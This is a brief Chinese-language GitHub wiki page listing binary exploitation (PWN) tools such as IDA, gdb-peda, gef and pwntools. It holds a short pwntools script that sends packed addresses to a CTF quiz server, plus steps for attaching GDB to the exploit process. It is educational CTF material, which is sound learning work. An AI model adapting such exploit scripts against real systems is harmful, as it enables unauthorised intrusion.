PWN 常用工具 - ianchen0119/About-Security GitHub Wiki

pestudio

IDA

  • IDA Pro

gdb

  • gdb-peda
  • .gdbinit
  • gef

pwntools

from pwn import *
  2 context(arch = 'i386', os = 'linux')
  3 r = remote('quiz.ais3.org', 10102)
  4 s = r.recvuntil(':')
  5 print(s)
  6 r.sendline(p32(0x4210728)) # 將 16 進制轉換成 32 bits 的字串
  7 s = r.recvuntil(':')
  8 print(s)
  9 r.sendline(p32(0x4210824)) # 將 16 進制轉換成 32 bits 的字串
 10 r.interactive()

連上 GDB

  1. 在 exploit.py 加上 raw_input() 並執行
  2. 這時候我們會拿到目標的 Process I'd
  3. 拿到 pid 以後,打開 GDB 並輸入:
attach your_pid_number